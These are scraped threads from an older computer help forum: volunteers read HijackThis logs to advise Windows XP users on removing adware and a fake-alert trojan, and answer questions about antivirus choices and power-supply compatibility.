O18 - Protocol: bw50s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw60 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw60s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw70 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
Quote
O18 - Protocol: bw80 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw80s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw90 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw90s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwa0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwa0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwb0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwb0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwc0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwc0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwd0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwd0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwe0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwe0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwf0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwf0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwfile-8876480 - {9462A756-7B47-47BC-8C80-C34B9B80B32B} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\GAPlugProtocol-8876480.dll
O18 - Protocol: bwg0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwg0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwh0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwh0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwi0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwi0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwj0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwj0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwk0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwk0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwl0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwl0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwm0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwm0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwn0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwn0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwo0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwo0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwp0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
Quote
O18 - Protocol: bwp0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwq0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwq0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwr0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwr0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bws0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bws0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwt0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwt0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwu0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwu0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwv0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwv0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bww0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bww0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwx0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwx0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwy0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwy0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwz0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwz0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - "C:\PROGRA~1\MSNMES~1\msgrapp.dll" (file missing)
O18 - Protocol: offline-8876480 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O23 - SERVICE: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
O23 - Service: CAISafe - Computer Associates International, Inc. - C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\ISafe.exe
O23 - Service: ewido security suite control - ewido networks - C:\Program Files\ewido\security suite\ewidoctrl.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Kerio Personal Firewall 4 (KPF4) - Kerio Technologies - C:\Program Files\Kerio\Personal Firewall 4\kpf4ss.exe
O23 - Service: NICSer_WMP11 - Unknown owner - C:\Program Files\Linksys\WMP11 Config Utility\NICServ.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\System32\HPZipm12.exe
O23 - Service: StyleXPService - Unknown owner - C:\Program Files\TGTSoft\StyleXP\StyleXPService.exe (file missing)
O23 - Service: VET Message Service (VETMSGNT) - Computer Associates International, Inc. - C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\VetMsg.exe
 Armando........Looking at your logfile and I note that for some reason you have not installed XP SP2...... It has a number of improved features and additional security . It also includes an newer IE than you are using .....

I also note you are using 2 anti virus apps ......... You would be better off with just one.

Do you actualy use the apps that appear in your running processes ?  Removing some of them would probably improve performance.
Do you require .......
C:\Program Files\UberIcon\UberIcon Manager.exe
C:\Program Files\WinRoll\winroll.exe ( this one could be a keystroke logger )


If this was my machine , I would MARK for removal the following....

O2 - BHO: (no name) - {3AF9102C-EB4E-47B5-8751-60550E872E39} - (no file)
O2 - BHO: (no name) - {5C8B2A36-3DB1-42A4-A3CB-D426709BBFEB} - (no file)
O2 - BHO: (no name) - {614BBBCC-5C08-30A8-2BB6-0495C885DCBC} - (no file)
O2 - BHO: (no name) - {6449E3C9-575F-61AA-2BB6-0495C885DFEB} - (no file)
O2 - BHO: (no name) - {FD704130-FFAA-C159-D0E9-A10FA1E64EB7} - (no file
O2 - BHO: (no name) - {FD704140-FFDF-B258-D0EF-D00FD3954EC2} - (no file)
  O3 - Toolbar: (no name) - {40D41A8B-D79B-43d7-99A7-9EE0F344C385} - (no file)  
O8 - Extra context menu item: &MSN Search - res://C:\Program Files\MSN Toolbar Suite\TB\02.00.0001.1203\en-us\msntb.dll/search.htm
O9 - Extra button: PartyPoker.net - {F4430FE8-2638-42e5-B849-800749B94EED} - C:\Program Files\PartyPoker.net\partypokernet.exe (file missing)
O9 - Extra 'Tools' menuitem: PartyPoker.net - {F4430FE8-2638-42e5-B849-800749B94EED} - C:\Program Files\PartyPoker.net\partypokernet.exe (file missing)
O9 - Extra button: WeatherBug - {AF6CABAB-61F9-4f12-A198-B7D41EF1CB52} - C:\Program Files\AWS\WeatherBug\Weather.exe (file missing) (HKCU)

I would remove all of the 018 entries with the exception of this one ......
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - "C:\PROGRA~1\MSNMES~1\msgrapp.dll" (file missing)

Do you use this ......
O23 - Service: StyleXPService - Unknown owner - C:\Program Files\TGTSoft\StyleXP\StyleXPService.exe (file missing)
If you don't I would remove it.

You should also consider doing a thorough cleaning of the unused items in your pc .......
You might also wish to D/l and install  CCleaner    ..... http://www.ccleaner.com/

Please try and answer the questions before you attempt to remove anything.

dl65   Quote
Armando........Looking at your logfile and I note that for some reason you have not installed XP SP2...... It has a number of improved features and additional security . It also includes an newer IE than you are using .....
I've tried installing it numerous times but it always gives me an ERROR saying my verification key or validation code isn't genuine or something. It sends me to the Microsoft website and it tells me my Windows XP isn't genuine.. I've posted a thread about the problem before but all I heard was that I need to re-install Windows XP with a new disc, which I don't have.
 
Quote
I also note you are using 2 anti virus apps ......... You would be better off with just one.
I use AVG antivirus, ewido security suite, and kerio personal firewall. Which do you recommend I remove?  
 
Quote
Do you actualy use the apps that appear in your running processes ?  Removing some of them would probably improve performance.
Do you require .......
C:\Program Files\UberIcon\UberIcon Manager.exe  
C:\Program Files\WinRoll\winroll.exe ( this one could be a keystroke logger )
Never used them, no idea what they are for.
 
Quote
Do you use this ......
O23 - Service: StyleXPService - Unknown owner - C:\Program Files\TGTSoft\StyleXP\StyleXPService.exe (file missing)  
If you don't I would remove it.
I used to but I don't anymore, so I should remove it.
 
Quote
You should also consider doing a thorough cleaning of the unused items in your pc .......  
You might also wish to D/l and install  CCleaner    ..... http://www.ccleaner.com/
I use it everyday. I've been using it for over 4 months now/..
 
Armando.... Quote
I've tried installing it numerous times but it always gives me an error saying my verification key or validation code isn't genuine or something. It sends me to the Microsoft website and it tells me my Windows XP isn't genuine.. I've posted a thread about the problem before but all I heard was that I need to re-install Windows XP with a new disc, which I don't have.  
  If you have a authentic original win XP disk and it has only been installed on that pc ...... you should be getting on the phone to M/S and get it sorted out .

Quote
I use AVG antivirus, ewido security suite, and kerio personal firewall. Which do you recommend I remove?
 

I wouldnt suggest you remove any of those ..... however according to your running processes , you have eTrust EZ Antivirus installed and runniong ..... If you dont use it uninstall it .

Quote
Do you actualy use the apps that appear in your running processes ? Removing some of them would probably improve performance.
Do you require .......
C:\Program Files\UberIcon\UberIcon Manager.exe
C:\Program Files\WinRoll\winroll.exe ( this one could be a keystroke logger )
Never used them, no idea what they are for.
  Then I would remove them
Quote
Do you use this ......
O23 - Service: StyleXPService - Unknown owner - C:\Program Files\TGTSoft\StyleXP\StyleXPService.exe (file missing)
If you don't I would remove it.
I used to but I don't anymore, so I should remove it.
 ....  Yes remove them

ok ...lets start with those and then well will look at it again......

I think there are more that perhaps should be removed .
How about these .....
C:\Program Files\YzShadow\YzShadow.exe
C:\Program Files\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe
If you dont know what they are ........remove them as well.

ok .....deal with those and then post a new hijackthis logfile.

dl65  






Actually some more questions (sorry)

The EZ Anti-virus my dad purchased so I can't really remove it otherwise he'll get angry. (yes, I know, it's not good at all, but he bought it.. *sigh*) SO then which one should I remove?

C:\Program Files\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe  
That's for a program that remembers all of my passwords and I click it and fills out my username and password for all websites I visit. I do use it. (Misc. question= Is it good? Should I get rid of it?)

About the disk.. Installed it a LONG time ago.. Long lost disk. WHat should I do?

Edit: Thank you so much for the help..Armando.......
Quote
The EZ Anti-virus my dad purchased so I can't really remove it otherwise he'll get angry. (yes, I know, it's not good at all, but he bought it.. *sigh*) SO then which one should I remove?
  C.A. Computer Associates is a well known company and while I have no first hand knowledge of its  EZ Anti-virus , I would think that if it is current and updated ,it should be as good as AVG free ....... ( I would suggest using EZ anti-virus and simply disable AVG ....( dont remove it at this time )

Quote
C:\Program Files\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe  
That's for a program that remembers all of my passwords and I click it and fills out my username and password for all websites I visit. I do use it. (Misc. question= Is it good? Should I get rid of it?)
 OK , if it's something you use leave it ........ it doesnt appear to be a threat .  Usually sites have a box to tick if you want to remember the password ........ I dont have a lot of faith in programs that offer to save that info ....... But thats a personal thing .........

Quote
About the disk.. Installed it a LONG time ago.. Long lost disk. WHat should I do?
 It disturbs me when I hear the comment ...oh I lost the cd ....... How would you do a format and reinstall if required ?

What about this one ...... C:\Program Files\YzShadow\YzShadow.exe  


dl65   Quote
It disturbs me when I hear the comment ...oh I lost the cd ....... How would you do a format and reinstall if required ?

Pardon me if I'm not the average American who thinks of these things when he gets a computer. I guess I'm just absent-minded  

Quote
What about this one ...... C:\Program Files\YzShadow\YzShadow.exe  
Don't use it.. Armando......
Quote
What about this one ...... C:\Program Files\YzShadow\YzShadow.exe
Don't use it..
  Then /I would remove it ....

While you were off line , I went back and checked some of your earlier posts ........ re the Xp SP2 issue ....... If I read correctly , your pc came with ME and the cd you were using was used to install XP on your Moms and Dads laptops .......  that would explain your issue .

dl65   Armando...  ok , lets mark for removal the items listed above in your hijacklog and then click fix checked and reboot and post a new logfile.

dl65  Yes the CD was used to install XP on my stepmom's computer..

I did what you told me to and rebooted (I couldn't find how to check the Program Files so they could be fixed so those weren't changed)

115.

Solve : Norman Antivirus?

Answer»

I'm using Norman Antivirus. My employer, a medium sized Australian company, uses it and recommends it for employees working at home. They also provide it free of charge.
Is Norman a good choice or should I invest in something else?Never used it, but here is a review. AVG is free to everyone and hasa worked well for me. I  sure wouldn't PAY  for Norman.

http://www.pcmag.com/article2/0,1759,1371091,00.aspReading the pcmag review added to the fact that you had to ask if you should USE it, I'd advise getting AVG Free also.It's been a while since I've looked at DDS's Norman AV is/was fairly respectable as AV utilities go but it's lack of control, it's pretty poor heuristics, poor unpacking capability and a few other niggles make it a poor contender as a commercial AV solution.

Do you have any alternatives in mind? Are you looking at purely home use or is there an organisation involved? Are there any special requirements or wishlists?

If you WANT a commercial AV solution, then you won't go wrong with Kaspersky Labs. If used in conjunction with the "redundant database" option, it just about negates the need for other anti malware/anti trojan SOFTWARE. Kaspersky offer an hourly update service. The Personal Pro version costs UK£47 but for that, you get two licences. So, if you can find someone else who wants a copy, it's UK£23.50.
There will be a free upgrade to vers 6 which is just about to come out of beta. (Beta testers may still be needed). Free time limited trials are available.

Phew!..... Sounds like I'm plugging KAV. I suppose I am in a way, but it's so damned good!
To make up for that, here's a good selection of mostly free, very USEFUL and above all, clean software [highlight]here[/highlight]. Enjoy!

116.

Solve : Power supply units?

Answer» OK you guys have been wonderful to me in the past. Now i'm back with probably a stupid question.  I have to upgrade my power supply before I can install a new graphics card. Found a nice 450 watt thing. Says it's SATA supported. I have googled the *%$# for sata vs. IDE. I have an IDE. ( i should have bought an apple), Never did i think i would have to spend so much time just TRYING to update my darned computer. IF i don't have SATA on my system, and i have no idea how to tell except i ran a check and everything says IDE on it, will i fry my mother board? Please dumb it down. thanks. Cheriewintermoon... could you post a link to the psu you have found ?   I would think its telling you that it will have output (s) for SATA ......... If its a ATX power supply it should be just fine ...unless you have a computer that requires a propriotory psu

dl65  wintermoon... Would you happen to know what motherboard you have ?

dl65  http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=5414
36&Sku=D15-1000

I have an AMD Sempron 3500+
1 gig Ram
160 G hd
Radeon PCI xpress 200 256 DDR
it's a compaq presario 1750 NX with upgrades

sheesh i love you guys.
wintermoon  ....  Could you post the actual link to the page that the psu is on ....The link posted gets me to Tiger direct but not to the actual PSU you are interested in .


dl65  http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=541436&Sku=D15-1000i keep trying. the url doesn't seem to fit into the frame work. Let me know if that one worked. if not. we can try something else. thank you.wintermoon.....is this the one ?  
Specifications

AC INPUT 115V/230V 10A/6A 60/50Hz
DC OUTPUT +3.3V +5V +12V -12V -5V +5VSB
550W Max
Combined
Watts 28A 40A 20A 0.8A 0.5A 2A
550W

Connectors

1x Main Power 20-Pin
1x AUX Power
1x 12V (P4)
[highlight]6x Peripheral [/highlight]  you will use these to power the hard drive, but not all 6.... lol
2x Floppy
2x Serial ATA
Features

Serial ATA Ready
Dual LED Fans (120mm and 80mm)
Laser-Cut Fan GRILL
Low Noise
Short Circuit Protection
Over Voltage Protection
Overload Protection

dl65  YES that's the one!
117.

Solve : Spyware Trouble?

Answer»

My desktop was replaced by a huge "warning infected cpmputer" image and an html keeps appearing on my desktop called "adware reviews" and the properties point to http://www.topadwarereviews.com/?adv=196&ads=b which I HAVE NOT clicked. ALSO, in the system tray I keep getting these 2 popup balloon alerts saying "critical system alert:spyware detected"

I have run a virus scan (ca ez ntivirus), and etrust pest patrol, plus ad-aware, spybot and the smitrem tool from http://noahdfear.geekstogo.com/. After the smitrem tool it looked fixed for about 2 minutes. I dont KNOW what else to do, so here is my hijackthis log. I sure appreciate any help!

Logfile of HijackThis v1.99.1
Scan saved at 2:06:46 AM, on 3/5/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5296.0000)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EXE
C:\WINDOWS\Explorer.EXE
C:\Program Files\CA\eTrust Internet Security Suite\eTrust EZ Antivirus\ISafe.exe
C:\Program Files\Executive Software\Diskeeper\DkService.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\CA\eTrust Internet Security Suite\eTrust PestPatrol Anti-Spyware\PPActiveDetection.exe
C:\Program Files\Lexmark X5100 Series\lxbabmgr.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\Program Files\NVIDIA Corporation\NvMixer\NVMixerTray.exe
C:\Program Files\Lexmark X5100 Series\lxbabmon.exe
C:\Program Files\CA\eTrust Internet Security Suite\caissdt.exe
C:\Program Files\CA\eTrust Internet Security Suite\eTrust Anti-Spam\QSP-4.0.380.0\QOELoader.exe
C:\Program Files\CA\eTrust Internet Security Suite\eTrust EZ Antivirus\CAVTray.exe
C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxMediaDB.exe
C:\Program Files\CA\eTrust Internet Security Suite\eTrust EZ Antivirus\CAVRID.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\ASUS\Probe\AsusProb.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\CA\eTrust Internet Security Suite\eTrust Personal Firewall\ca.exe
C:\Program Files\Ahead\Nero BackItUp\NBJ.exe
C:\Program Files\Logitech\MouseWare\system\em_exec.exe
C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE
C:\Program Files\Common Files\Microsoft Shared\Works Shared\WkCalRem.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\wupdmgr.exe
C:\WINDOWS\osaupd.exe
C:\Program Files\CA\eTrust Internet Security Suite\eTrust EZ Antivirus\VetMsg.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Documents and Settings\Irish\Desktop\hijackthis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.adelphia.net/index.php
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=54729
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=55245&clcid={SUB_CLCID}
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: winapi32.MyBHO - {86A0607D-6126-45AE-8A29-46C181AFF4D6} - C:\WINDOWS\system32\winapi32.dll (file missing)
O2 - BHO: (no name) - {8702d9e1-890b-4bf2-a233-fa44e582b2de} - (no file)
O2 - BHO: ST - {9394EDE7-C8B5-483E-8773-474BF36AF6E4} - C:\Program Files\MSN Apps\ST\01.03.0000.1005\en-xu\stmain.dll
O2 - BHO: (no name) - {9EAC0102-5E61-2312-BC2D-000000000000} - (no file)
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: MSNToolBandBHO - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\MSN Apps\MSN Toolbar\MSN Toolbar\01.02.5000.1021\en-us\msntb.dll
O2 - BHO: (no name) - {cf021f40-3e14-23a5-cba2-716d74632608} - (no file)
O2 - BHO: (no name) - {d53b810f-6219-11d4-95b6-0040950375e7} - (no file)
O2 - BHO: (no name) - {dd6f50c0-9f8f-a41c-291e-7b3fb818ef18} - (no file)
O2 - BHO: (no name) - {f21bd77e-0cce-c6cd-4f85-aa3b7895988e} - (no file)
O2 - BHO: (no name) - {ff731508-cd28-e0b0-3e85-0cf55fde9fba} - (no file)
O4 - HKLM\..\Run: [eTrustPPAP] "C:\Program Files\CA\eTrust Internet Security Suite\eTrust PestPatrol Anti-Spyware\PPActiveDetection.exe"
O4 - HKLM\..\Run: [DiskeeperSystray] "C:\Program Files\Executive Software\Diskeeper\DkIcon.exe"
O4 - HKLM\..\Run: [Lexmark X5100 Series] "C:\Program Files\Lexmark X5100 Series\lxbabmgr.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [REGSHAVE] C:\Program Files\REGSHAVE\REGSHAVE.EXE /AUTORUN
O4 - HKLM\..\Run: [NVMixerTray] "C:\Program Files\NVIDIA Corporation\NvMixer\NVMixerTray.exe"
O4 - HKLM\..\Run: [Logitech Utility] Logi_MwX.Exe
O4 - HKLM\..\Run: [CaISSDT] "C:\ProThe following has turned up as nasty:

       C:\WINDOWS\wupdmgr.exe

What it is: http://www.processlibrary.com/directory/files/wupdmgr/index.php

You have a virus/trojan. This is to be removed ASAP.  

It looks like you've TRIED a few scanners... We might need to remove this manually... Try Trend Micro's free scanner (see solution page) See this link... After reading it, CLICK on Solution... http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SPYBOT.B  ...

FlameDid you do the cleaning from safe mode with system restore turned off?  I did run the smitrem tool in safe mode, trying the Trend Micro now. I will let it run and I'll be gone all day, so we'll see what awaits when I return from that scan :-/If the Trend Micro scanner does not work, follow the instructions I gave you to manually remove it.

FlameThe HJT log is incomplete but as suspected from your initial description, a SmitFraud infection seems to be present. Follow the instructions exactly as laid out [highlight]here[/highlight] and then carry out the procedures listed [highlight]here[/highlight]. It would be worth reading this second link first if you're uncertain about setting up Explorer to "Show All Files" etc and disabling System Restore. Post a Hijackthis logfile here when done.

Remember, all instructions must be carried out to the letter or the cleaning processes will FAIL.

118.

